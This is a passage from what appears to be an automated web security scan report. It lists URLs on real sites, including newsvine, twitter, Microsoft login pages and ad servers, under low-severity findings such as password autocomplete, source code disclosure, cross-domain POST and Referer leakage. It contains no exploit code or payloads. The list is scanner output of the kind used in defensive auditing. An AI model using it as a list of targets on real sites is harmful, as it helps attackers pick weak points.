17.468. http://www.newsvine.com/

17.469. http://www.newsvine.com/_action/article/emailThis

17.470. http://www.newsvine.com/_action/user/logout

17.471. http://www.newsvine.com/_action/user/startTracking

17.472. http://www.newsvine.com/_action/user/stopTracking

17.473. http://www.newsvine.com/_api/comments/getComments

17.474. http://www.newsvine.com/_api/question/getUserData

17.475. http://www.newsvine.com/_api/user/convTracker

17.476. http://www.newsvine.com/_nv/accounts/newsvine/emailAlerts

17.477. http://www.newsvine.com/_nv/api/accounts/login

17.478. http://www.newsvine.com/_tools/user/login

17.479. http://www.newsvine.com/_vine/js/m1/global.js

17.480. https://www.newsvine.com/

17.481. https://www.newsvine.com/_action/user/logout

17.482. https://www.newsvine.com/_nv/accounts/global/information

17.483. https://www.newsvine.com/_nv/accounts/login

17.484. https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts

17.485. https://www.newsvine.com/_nv/accounts/msnbc/newsletters

17.486. https://www.newsvine.com/_nv/accounts/register

17.487. https://www.newsvine.com/_nv/api/accounts/login

17.488. https://www.newsvine.com/_nv/api/accounts/resetPassword

17.489. http://www.omniture.com/

17.490. http://www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|redacted/wonderwall|v14.redacted/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

17.491. http://www.reimage.com/track_new/track.php

17.492. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|redacted/wonderwall|v14.redacted/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

17.493. http://www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

17.494. http://www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

17.495. http://www.theworkbuzz.com/employment-trends/video-interviews/

17.496. http://www.theworkbuzz.com/fun-stuff/your-work-soundtrack/

17.497. http://www.tigerdirect.com/cgi-bin/icart.asp

17.498. http://www.tigerdirect.com/sectors/sweepstakes/asus/asusCoreI7Giveaway_popUnder.asp

17.499. http://www.tigerdirect.com/secure/captcha/Default.aspx

17.500. http://www.youtube.com/embed/CKZzn00w01M

17.501. http://www.youtube.com/embed/mm8byzo8zWE

18. Password field with autocomplete enabled

18.1. http://digg.com/search

18.2. http://eurekalert.org/

18.3. https://login.silverlight.net/login/signin.aspx

18.4. http://msn.chemistry.com/cp/landing/44762

18.5. http://msn.chemistry.com/cp/landing/44762

18.6. http://msn.chemistry.com/cp/landing/57269

18.7. http://msn.chemistry.com/cp/landing/57269

18.8. http://msn.chemistry.com/cp/landing/57269

18.9. https://secure.scout.com/a.z

18.10. https://secure.scout.com/a.z

18.11. https://secure.scout.com/a.z

18.12. http://spacefellowship.com/

18.13. http://twitter.com/

18.14. http://twitter.com/HelenASPopkin

18.15. http://twitter.com/MichaelWann

18.16. http://twitter.com/windabenedetti

18.17. http://twitter.com/wjrothman

18.18. https://twitter.com/ToddKenreck

18.19. http://www.dailygrail.com/

18.20. http://www.delish.com/entertaining-ideas/party-ideas/valentines-day-romantic-recipes-tips

18.21. http://www.delish.com/food/recalls-reviews/its-not-bakery-its-digiorno

18.22. http://www.facebook.com/2008/fbml

18.23. http://www.facebook.com/HelenASPopkin

18.24. http://www.facebook.com/plugins/likebox.php

18.25. http://www.facebook.com/sharer.php

18.26. http://www.facebook.com/todd.kenreck

18.27. http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html

18.28. http://www.newsvine.com/

18.29. http://www.newsvine.com/_tools/user/login

18.30. https://www.newsvine.com/

18.31. https://www.newsvine.com/_nv/accounts/login

18.32. https://www.newsvine.com/_nv/accounts/msnbc/newsletters

18.33. https://www.newsvine.com/_nv/accounts/register

18.34. http://www.polls.newsvine.com/

18.35. http://www.polls.newsvine.com/_nv/cms/backyard/greenhouse

18.36. http://www.polls.newsvine.com/_nv/cms/backyard/tools

18.37. http://www.polls.newsvine.com/_nv/cms/help/faq

18.38. http://www.polls.newsvine.com/_nv/cms/info/codeOfHonor

18.39. http://www.polls.newsvine.com/_nv/cms/info/companyInfo

18.40. http://www.polls.newsvine.com/_nv/cms/info/contact

18.41. http://www.polls.newsvine.com/_nv/cms/info/copyrightPolicy

18.42. http://www.polls.newsvine.com/_nv/cms/info/jobs

18.43. http://www.polls.newsvine.com/_nv/cms/info/privacyPolicy

18.44. http://www.polls.newsvine.com/_nv/cms/info/userAgreement

18.45. http://www.polls.newsvine.com/_nv/cms/welcome

18.46. http://www.polls.newsvine.com/_vine/a

18.47. http://www.polls.newsvine.com/_vine/js/m1/vine.js

18.48. http://www.scientificamerican.com/blog/observations/

18.49. http://www.scientificamerican.com/errors/404.cfm

18.50. http://www.six-telekurs.com/tkfich_index/tkfich_home.htm

18.51. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|redacted/wonderwall|v14.redacted/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

18.52. http://www.unmannedspaceflight.com/

18.53. http://www.unmannedspaceflight.com/

18.54. http://www.zacks.com/

19. Source code disclosure

19.1. http://fitbie.redacted/

19.2. http://oneightyla.vo.llnwd.net/o37/live/sony/2010_11_04_BLOGGIE/video/TubeFailWin-160x90.flv

19.3. http://platform.linkedin.com/js/anonymousFramework

19.4. http://sstatic.net/Js/wmd.js

19.5. http://sstatic.net/js/master.min.js

20. Referer-dependent response

20.1. http://stackauth.com/auth/global/read

20.2. http://stackoverflow.com/users/login/global/request

20.3. http://www.facebook.com/plugins/like.php

21. Cross-domain POST

21.1. http://astrocenter.astrology.redacted/msn/Default.aspx

21.2. http://curmudgeons.blogspot.com/

21.3. http://fancybox.net/

21.4. https://login.live.com/resetpw.srf

21.5. http://news.discovery.com/

21.6. http://planetary.org/blog

21.7. http://www.dailygrail.com/

21.8. http://www.hobbyspace.com/

21.9. http://www.slate.com/id/2282444/

21.10. http://www.transterrestrial.com/

22. Cross-domain Referer leakage

22.1. http://ad.doubleclick.net/adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6

22.2. http://ad.doubleclick.net/adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6

22.3. http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.3

22.4. http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.3

22.5. http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.5

22.6. http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.5

22.7. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8

22.8. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8

22.9. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8

22.10. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

22.11. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

22.12. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

22.13. http://ad.doubleclick.net/adi/N3973.MSN/B4412732.159

22.14. http://ad.doubleclick.net/adi/N3973.MSN/B4412732.159

22.15. http://ad.doubleclick.net/adi/N3973.MSN/B4412732.159

22.16. http://ad.doubleclick.net/adi/N4319.MSNMEN/B3889285.6

22.17. http://ad.doubleclick.net/adi/N4319.msn/B2087123.383

22.18. http://ad.doubleclick.net/adi/N4319.msn/B2087123.383

22.19. http://ad.doubleclick.net/adi/N4441.microsoftonline/B5073082

22.20. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903

22.21. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903

22.22. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903

22.23. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903

22.24. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4

22.25. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4

22.26. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4

22.27. http://ad.doubleclick.net/adi/tigerdirect.com/Section_2_House

22.28. http://ad.doubleclick.net/adj/N2465.SD137929N2465SN0/B4809700.27

22.29. http://ad.doubleclick.net/adj/N2465.SD137929N2465SN0/B4809700.8

22.30. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.31

22.31. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884**

22.32. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884**

22.33. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884**

22.34. http://ad.yieldmanager.com/pixel

22.35. http://add.my.yahoo.com/rss

22.36. http://ads.asp.net/a.aspx

22.37. http://ads.neudesicmediagroup.com/a.aspx

22.38. http://analytics.live.com/Sync.html

22.39. http://assets.tumblr.com/iframe.html

22.40. http://astrocenter.astrology.redacted/msn/Default.aspx

22.41. http://astrocenter.astrology.redacted/msn/Default.aspx

22.42. http://b.rad.redacted/ADSAdClient31.dll

22.43. http://b.rad.redacted/ADSAdClient31.dll

22.44. http://b.rad.redacted/ADSAdClient31.dll

22.45. http://b.rad.redacted/ADSAdClient31.dll

22.46. http://b.rad.redacted/ADSAdClient31.dll

22.47. http://b.rad.redacted/ADSAdClient31.dll

22.48. http://b.rad.redacted/ADSAdClient31.dll

22.49. http://b.rad.redacted/ADSAdClient31.dll

22.50. http://b.rad.redacted/ADSAdClient31.dll

22.51. http://b.rad.redacted/ADSAdClient31.dll

22.52. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90

22.53. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90

22.54. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90

22.55. http://ccc01.opinionlab.com/o.asp

22.56. http://cdn.lib.newsvine.com/_static/js/d57b389e60d7c68b274fdadecdd0b4f51248430e.js

22.57. http://cm.g.doubleclick.net/pixel

22.58. http://cms.ad.yieldmanager.net/v1/cms

22.59. http://cosmiclog.msnbc.redacted/_news/2011/01/28/5943271-egyptians-rush-to-save-tuts-riches/

22.60. http://cosmiclog.msnbc.redacted/_news/2011/01/28/5943271-egyptians-rush-to-save-tuts-riches/

22.61. http://dating.redacted/cp.aspx

22.62. http://dating.redacted/cp.aspx

22.63. http://dating.redacted/en-us/partner/msn/38028.html

22.64. http://dating.redacted/en-us/partner/msn/38028.html

22.65. http://dating.redacted/index.aspx

22.66. http://dating.redacted/index.aspx

22.67. http://dating.redacted/search/index.aspx

22.68. http://dating.redacted/search/index.aspx

22.69. http://dating.redacted/search/index.aspx

22.70. http://dating.redacted/search/index.aspx

22.71. http://dm.de.mookie1.com/2/B3DM/2010DM/1860849269@x23

22.72. http://editorial.autos.redacted/article.aspx

22.73. http://editorial.autos.redacted/article.aspx

22.74. http://editorial.autos.redacted/slideshow.aspx

22.75. http://editorial.autos.redacted/slideshow.aspx

22.76. http://english.aljazeera.net/_inc/adsrc.html

22.77. http://entertainment.redacted/news/

22.78. http://entertainment.redacted/news/

22.79. http://entertainment.redacted/video/

22.80. http://entertainment.redacted/video/

22.81. http://fitbie.redacted/eat-right/tips/stock-your-refrigerator-weight-loss

22.82. http://forums.silverlight.net/adchain.html

22.83. http://forums.silverlight.net/adchain.html

22.84. http://forums.silverlight.net/adchain.html

22.85. http://forums.silverlight.net/adchain.html

22.86. http://forums.silverlight.net/adchain.html

22.87. http://forums.silverlight.net/adchain.html

22.88. http://forums.silverlight.net/adchain.html

22.89. http://forums.silverlight.net/forums/TopicsNotAnswered.aspx

22.90. http://forums.silverlight.net/forums/topicsactive.aspx

22.91. http://go.microsoft.com/

22.92. http://go.microsoft.com/fwlink/

22.93. http://ingame.msnbc.redacted/_news/2011/01/25/5916141-my-virtual-girlfriend-is-real-world-creepy

22.94. http://ingame.msnbc.redacted/_news/2011/01/25/5916141-my-virtual-girlfriend-is-real-world-creepy

22.95. http://investing.money.redacted/investments/charts

22.96. http://investing.money.redacted/investments/currency-exchange-rates/

22.97. http://investing.money.redacted/investments/market-index/

22.98. http://investing.money.redacted/investments/stock-price

22.99. http://investing.money.redacted/investments/stock-price/

22.100. http://lifeinc.todayshow.com/_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never

22.101. http://lifeinc.todayshow.com/_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never

22.102. http://lifestyle.redacted/relationships/staticslideshowglamour.aspx

22.103. http://lifestyle.redacted/relationships/staticslideshowglamour.aspx

22.104. http://lifestyle.redacted/your-home/room-design/staticslideshowhb.aspx

22.105. http://lifestyle.redacted/your-home/room-design/staticslideshowhb.aspx

22.106. http://lifestyle.redacted/your-life/family-parenting/article.aspx

22.107. http://lifestyle.redacted/your-life/family-parenting/article.aspx

22.108. http://lifestyle.redacted/your-life/new-year-new-you/video.aspx

22.109. http://lifestyle.redacted/your-life/new-year-new-you/video.aspx

22.110. http://lifestyle.redacted/your-life/your-money-today/article.aspx

22.111. http://lifestyle.redacted/your-life/your-money-today/article.aspx

22.112. http://lifestyle.redacted/your-life/your-money-today/video.aspx

22.113. http://lifestyle.redacted/your-life/your-money-today/video.aspx

22.114. http://lifestyle.redacted/your-look/makeup-skin-care-hair/staticslideshowessence.aspx

22.115. http://lifestyle.redacted/your-look/makeup-skin-care-hair/staticslideshowessence.aspx

22.116. http://lifestyle.redacted/your-look/video/

22.117. http://lifestyle.redacted/your-look/video/

22.118. http://local.redacted/events.aspx

22.119. http://local.redacted/hourly.aspx

22.120. http://local.redacted/hourly.aspx

22.121. http://local.redacted/movies-events.aspx

22.122. http://local.redacted/movies-events.aspx

22.123. http://local.redacted/news.aspx

22.124. http://local.redacted/news.aspx

22.125. http://local.redacted/sports.aspx

22.126. http://local.redacted/sports.aspx

22.127. http://local.redacted/ten-day.aspx

22.128. http://local.redacted/ten-day.aspx

22.129. http://local.redacted/weather.aspx

22.130. http://local.redacted/weather.aspx

22.131. http://login.live.com/login.srf

22.132. https://login.live.com/login.srf

22.133. https://login.live.com/ppsecure/post.srf

22.134. https://login.live.com/ppsecure/secure.srf

22.135. https://login.silverlight.net/login/createuser.aspx

22.136. https://login.silverlight.net/login/createuser.aspx

22.137. https://login.silverlight.net/login/createuser.aspx

22.138. https://login.silverlight.net/login/createuser.aspx

22.139. https://login.silverlight.net/login/createuser.aspx

22.140. https://login.silverlight.net/login/createuser.aspx

22.141. https://login.silverlight.net/login/createuser.aspx

22.142. https://login.silverlight.net/login/createuser.aspx

22.143. https://login.silverlight.net/login/createuser.aspx

22.144. https://login.silverlight.net/login/createuser.aspx

22.145. https://login.silverlight.net/login/createuser.aspx

22.146. https://login.silverlight.net/login/createuser.aspx

22.147. https://login.silverlight.net/login/signin.aspx

22.148. https://login.silverlight.net/login/signin.aspx

22.149. https://login.silverlight.net/login/signin.aspx

22.150. https://login.silverlight.net/login/signin.aspx

22.151. https://login.silverlight.net/login/signin.aspx

22.152. https://login.silverlight.net/login/signin.aspx

22.153. https://login.silverlight.net/login/signin.aspx

22.154. https://login.silverlight.net/login/signin.aspx

22.155. https://login.silverlight.net/login/signin.aspx

22.156. https://login.silverlight.net/login/signin.aspx

22.157. https://login.silverlight.net/login/signin.aspx

22.158. https://login.silverlight.net/login/signin.aspx

22.159. https://login.silverlight.net/login/signin.aspx

22.160. https://login.silverlight.net/login/signin.aspx

22.161. https://login.silverlight.net/login/signin.aspx

22.162. https://login.silverlight.net/login/signin.aspx

22.163. https://login.silverlight.net/login/signin.aspx

22.164. https://login.silverlight.net/login/signin.aspx

22.165. https://login.silverlight.net/login/signin.aspx

22.166. https://login.silverlight.net/login/signin.aspx

22.167. https://login.silverlight.net/login/signin.aspx

22.168. https://login.silverlight.net/login/signin.aspx

22.169. https://login.silverlight.net/login/signin.aspx

22.170. https://login.silverlight.net/login/signin.aspx

22.171. http://money.redacted//

22.172. http://money.redacted//

22.173. http://money.redacted//

22.174. http://money.redacted/auto-insurance/article.aspx

22.175. http://money.redacted/auto-insurance/article.aspx

22.176. http://money.redacted/auto-insurance/article.aspx

22.177. http://money.redacted/auto-insurance/article.aspx

22.178. http://money.redacted/business-news/article.aspx

22.179. http://money.redacted/business-news/article.aspx

22.180. http://money.redacted/business-news/news.aspx

22.181. http://money.redacted/business-news/news.aspx

22.182. http://money.redacted/business-news/news.aspx

22.183. http://money.redacted/business-news/news.aspx

22.184. http://money.redacted/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx

22.185. http://money.redacted/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx

22.186. http://money.redacted/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx

22.187. http://money.redacted/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx

22.188. http://money.redacted/how-to-invest/default-dyn.aspx

22.189. http://money.redacted/how-to-invest/default-dyn.aspx

22.190. http://money.redacted/how-to-invest/video.aspx

22.191. http://money.redacted/how-to-invest/video.aspx

22.192. http://money.redacted/identity-theft/default-dyn.aspx

22.193. http://money.redacted/identity-theft/default-dyn.aspx

22.194. http://money.redacted/identity-theft/default-dyn.aspx

22.195. http://money.redacted/identity-theft/default-dyn.aspx

22.196. http://money.redacted/investing

22.197. http://money.redacted/investing

22.198. http://money.redacted/investing

22.199. http://money.redacted/investing

22.200. http://money.redacted/market-news/post.aspx

22.201. http://money.redacted/market-news/post.aspx

22.202. http://money.redacted/market-news/post.aspx

22.203. http://money.redacted/market-news/post.aspx

22.204. http://money.redacted/mutual-fund/default-dyn.aspx

22.205. http://money.redacted/mutual-fund/default-dyn.aspx

22.206. http://money.redacted/mutual-fund/default-dyn.aspx

22.207. http://money.redacted/mutual-fund/default-dyn.aspx

22.208. http://money.redacted/saving-money/50-30-20-budget.aspx

22.209. http://money.redacted/saving-money/50-30-20-budget.aspx

22.210. http://money.redacted/saving-money/50-30-20-budget.aspx

22.211. http://money.redacted/saving-money/50-30-20-budget.aspx

22.212. http://money.redacted/top-stocks/post.aspx

22.213. http://money.redacted/top-stocks/post.aspx

22.214. http://redacted/investor/StockRating/srstopstocksresults.aspx

22.215. http://redacted/investor/StockRating/srstopstocksresults.aspx

22.216. http://redacted/investor/charts/chartdl.aspx

22.217. http://redacted/investor/charts/chartdl.aspx

22.218. http://redacted/investor/charts/chartdl.aspx

22.219. http://redacted/investor/charts/chartdl.aspx

22.220. http://redacted/investor/charts/chartdl.aspx

22.221. http://redacted/investor/charts/chartdl.aspx

22.222. http://redacted/investor/charts/chartdl.aspx

22.223. http://redacted/investor/charts/chartdl.aspx

22.224. http://redacted/investor/charts/chartdl.aspx

22.225. http://redacted/investor/partsub/funds/etfperformancetracker.aspx

22.226. http://redacted/investor/partsub/funds/etfperformancetracker.aspx

22.227. http://redacted/investor/partsub/funds/etfperformancetracker.aspx

22.228. http://redacted/investor/partsub/funds/etfperformancetracker.aspx

22.229. http://movies.redacted/mom-pop-culture/tiger-mom-movie/story-feature/

22.230. http://movies.redacted/mom-pop-culture/tiger-mom-movie/story-feature/

22.231. http://msn.careerbuilder.com/Article/MSN-1302-Workplace-Issues-Excuse-Free-Time-Off/

22.232. http://msn.careerbuilder.com/Article/MSN-1391-Workplace-Issues-Nine-Questions-You-Should-Ask-Your-Boss/

22.233. http://msn.careerbuilder.com/Article/MSN-1951-Job-Search-Get-Paid-to-Socially-Network/

22.234. http://msn.careerbuilder.com/Article/MSN-2469-Job-Search-Job-advice-that-was-true-20-years-ago-150-but-not-today/

22.235. http://msn.careerbuilder.com/msn/default.aspx

22.236. http://msn.careerbuilder.com/msn/default.aspx

22.237. http://msn.chemistry.com/cp/landing/44762

22.238. http://msn.chemistry.com/cp/landing/57269

22.239. http://msn.foxsports.com/nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/

22.240. http://msn.foxsports.com/nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/

22.241. http://msn.foxsports.com/video

22.242. http://my.live.com/

22.243. http://my.redacted/addtomymsn.armx

22.244. http://my.redacted/addtomymsn.armx

22.245. http://oasc03049.popsci.com/RealMedia/ads/adstream_mjx.ads/www.popsci.com/index.jsp/1660224145@Top,Top1,Right1,Right2,Right3,Bottom,BottomRight,Position1,x96,Frame1,x89,x90,x01,x02,x03,x04,x05

22.246. http://oascentral.scientificamerican.com/RealMedia/ads/adstream_mjx.ads/sciam.com/observations/1762199143@Top,Right1,Right2,x40,x41

22.247. http://photoblog.msnbc.redacted/_news/2011/01/28/5942494-double-whammy-on-the-sun

22.248. http://photoblog.msnbc.redacted/_news/2011/01/28/5942494-double-whammy-on-the-sun

22.249. http://photoblog.msnbc.redacted/_news/2011/01/28/5942494-double-whammy-on-the-sun

22.250. http://photoblog.msnbc.redacted/_news/2011/01/28/5942494-double-whammy-on-the-sun

22.251. http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64

22.252. http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64

22.253. http://rad.redacted/ADSAdClient31.dll

22.254. http://rad.redacted/ADSAdClient31.dll

22.255. http://rad.redacted/ADSAdClient31.dll

22.256. http://rad.redacted/ADSAdClient31.dll

22.257. http://rad.redacted/ADSAdClient31.dll

22.258. http://rad.redacted/ADSAdClient31.dll

22.259. http://rad.redacted/ADSAdClient31.dll

22.260. http://rad.redacted/ADSAdClient31.dll

22.261. http://rad.redacted/ADSAdClient31.dll

22.262. http://rad.redacted/ADSAdClient31.dll

22.263. http://rad.redacted/ADSAdClient31.dll

22.264. http://rad.redacted/ADSAdClient31.dll

22.265. http://rad.redacted/ADSAdClient31.dll

22.266. http://rad.redacted/ADSAdClient31.dll

22.267. http://rad.redacted/ADSAdClient31.dll

22.268. http://rad.redacted/ADSAdClient31.dll

22.269. http://rad.redacted/ADSAdClient31.dll

22.270. http://rad.redacted/ADSAdClient31.dll

22.271. http://rad.redacted/ADSAdClient31.dll

22.272. http://rad.redacted/ADSAdClient31.dll

22.273. http://rad.redacted/ADSAdClient31.dll

22.274. http://rad.redacted/ADSAdClient31.dll

22.275. http://rad.redacted/ADSAdClient31.dll

22.276. http://rad.redacted/ADSAdClient31.dll

22.277. http://rad.redacted/ADSAdClient31.dll

22.278. http://rad.redacted/ADSAdClient31.dll

22.279. http://rad.redacted/ADSAdClient31.dll

22.280. http://rad.redacted/ADSAdClient31.dll

22.281. http://rad.redacted/ADSAdClient31.dll

22.282. http://rad.redacted/ADSAdClient31.dll

22.283. http://rad.redacted/ADSAdClient31.dll

22.284. http://rad.redacted/ADSAdClient31.dll

22.285. http://realestate.redacted/OmRedir.aspx

22.286. http://realestate.redacted/article.aspx

22.287. http://realestate.redacted/article.aspx

22.288. http://realestate.redacted/slideshow.aspx

22.289. http://realestate.redacted/slideshow.aspx

22.290. http://recruiting.scout.com/a.z

22.291. http://rss.scout.com/rss.aspx

22.292. http://search.twitter.com/search

22.293. http://search.twitter.com/search

22.294. https://secure.opinionlab.com/ccc01/o.asp

22.295. https://secure.scout.com/a.z

22.296. http://social.entertainment.redacted/movies/blogs/the-hitlist-blog.aspx

22.297. http://social.entertainment.redacted/movies/blogs/the-hitlist-blog.aspx

22.298. http://social.entertainment.redacted/movies/blogs/videodrone-blog.aspx

22.299. http://social.entertainment.redacted/movies/blogs/videodrone-blog.aspx

22.300. http://social.entertainment.redacted/movies/blogs/videodrone-blogpost.aspx

22.301. http://social.entertainment.redacted/movies/blogs/videodrone-blogpost.aspx

22.302. http://specials.redacted/A-List/Entertainment/Charlie-Sheen-checks-into-rehab-show-on-hiatus.aspx

22.303. http://specials.redacted/A-List/Entertainment/Charlie-Sheen-checks-into-rehab-show-on-hiatus.aspx

22.304. http://specials.redacted/A-List/Entertainment/Diddy-sued-for-$1-trillion.aspx

22.305. http://specials.redacted/A-List/Entertainment/Diddy-sued-for-$1-trillion.aspx

22.306. http://specials.redacted/A-List/Entertainment/Famous-February-birthdays.aspx

22.307. http://specials.redacted/A-List/Entertainment/Famous-February-birthdays.aspx

22.308. http://specials.redacted/A-List/Entertainment/Jesse-James-ex-arrested.aspx

22.309. http://specials.redacted/A-List/Entertainment/Jesse-James-ex-arrested.aspx

22.310. http://specials.redacted/A-List/Entertainment/PETAs-newest-naked-celeb.aspx

22.311. http://specials.redacted/A-List/Entertainment/PETAs-newest-naked-celeb.aspx

22.312. http://specials.redacted/A-List/Entertainment/Unlikely-celebrity-friendships.aspx

22.313. http://specials.redacted/A-List/Entertainment/Unlikely-celebrity-friendships.aspx

22.314. http://specials.redacted/A-List/Lifestyle/Billionaires-caucus.aspx

22.315. http://specials.redacted/A-List/Lifestyle/Billionaires-caucus.aspx

22.316. http://specials.redacted/A-List/Lifestyle/Cruise-ships-avoiding-stops-in-Mazatlan.aspx

22.317. http://specials.redacted/A-List/Lifestyle/Cruise-ships-avoiding-stops-in-Mazatlan.aspx

22.318. http://specials.redacted/A-List/Lifestyle/Daughter-held-in-moms-run-over-death.aspx

22.319. http://specials.redacted/A-List/Lifestyle/Daughter-held-in-moms-run-over-death.aspx

22.320. http://specials.redacted/A-List/Lifestyle/Egypt-new-vp.aspx

22.321. http://specials.redacted/A-List/Lifestyle/Egypt-new-vp.aspx

22.322. http://specials.redacted/A-List/Lifestyle/Famous-escapes.aspx

22.323. http://specials.redacted/A-List/Lifestyle/Famous-escapes.aspx

22.324. http://specials.redacted/A-List/Lifestyle/Mom-kills-teens.aspx

22.325. http://specials.redacted/A-List/Lifestyle/Mom-kills-teens.aspx

22.326. http://specials.redacted/A-List/Lifestyle/Nathan-Woods-dies.aspx

22.327. http://specials.redacted/A-List/Lifestyle/Nathan-Woods-dies.aspx

22.328. http://specials.redacted/A-List/Lifestyle/Professor-accused-defacing-colleagues-door.aspx

22.329. http://specials.redacted/A-List/Lifestyle/Professor-accused-defacing-colleagues-door.aspx

22.330. http://specials.redacted/A-List/Lifestyle/Taco-Bell-fights-back.aspx

22.331. http://specials.redacted/A-List/Lifestyle/Taco-Bell-fights-back.aspx

22.332. http://specials.redacted/A-List/Lifestyle/Twitter-Death-Hoaxes-2010.aspx

22.333. http://specials.redacted/A-List/Lifestyle/Twitter-Death-Hoaxes-2010.aspx

22.334. http://specials.redacted/A-List/TV/Reality-show-and-housewives.aspx

22.335. http://specials.redacted/A-List/TV/Reality-show-and-housewives.aspx

22.336. http://specials.redacted/IEIncreaseFont_preview.aspx

22.337. http://specials.redacted/IEIncreaseFont_preview.aspx

22.338. http://sstatic.net/Js/wmd.js

22.339. http://stackoverflow.com/users/login

22.340. http://syndication.jobthread.com/jt/syndication/page.php

22.341. http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/

22.342. http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/

22.343. http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/

22.344. http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/

22.345. http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/

22.346. http://technolog.msnbc.redacted/_nv/more/section/archive

22.347. http://technolog.msnbc.redacted/_nv/more/section/archive

22.348. http://theinvestedlife.redacted/

22.349. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/click.txt

22.350. http://tv.redacted/tv/article.aspx

22.351. http://tv.redacted/tv/article.aspx

22.352. http://redcated/CNT/iview/286609711/direct

22.353. http://redcated/CNT/iview/286609711/direct

22.354. http://redcated/CNT/iview/286609711/direct

22.355. http://redcated/CNT/iview/286609711/direct

22.356. http://redcated/CNT/iview/286609711/direct

22.357. http://redcated/CNT/iview/287065754/direct

22.358. http://redcated/DEN/jview/286026710/direct

22.359. http://redcated/NYC/iview/264935949/direct

22.360. http://wonderwall.redacted/movies/celeb-inc-for-jan-28-11106.gallery

22.361. http://wonderwall.redacted/movies/celeb-inc-for-jan-28-11106.gallery

22.362. http://wonderwall.redacted/music/chris-brown-completes-domestic-violence-program-1594072.story

22.363. http://wonderwall.redacted/music/chris-brown-completes-domestic-violence-program-1594072.story

22.364. http://wonderwall.redacted/tv/jaime-pressly-files-for-divorce-1594033.story

22.365. http://wonderwall.redacted/tv/jaime-pressly-files-for-divorce-1594033.story

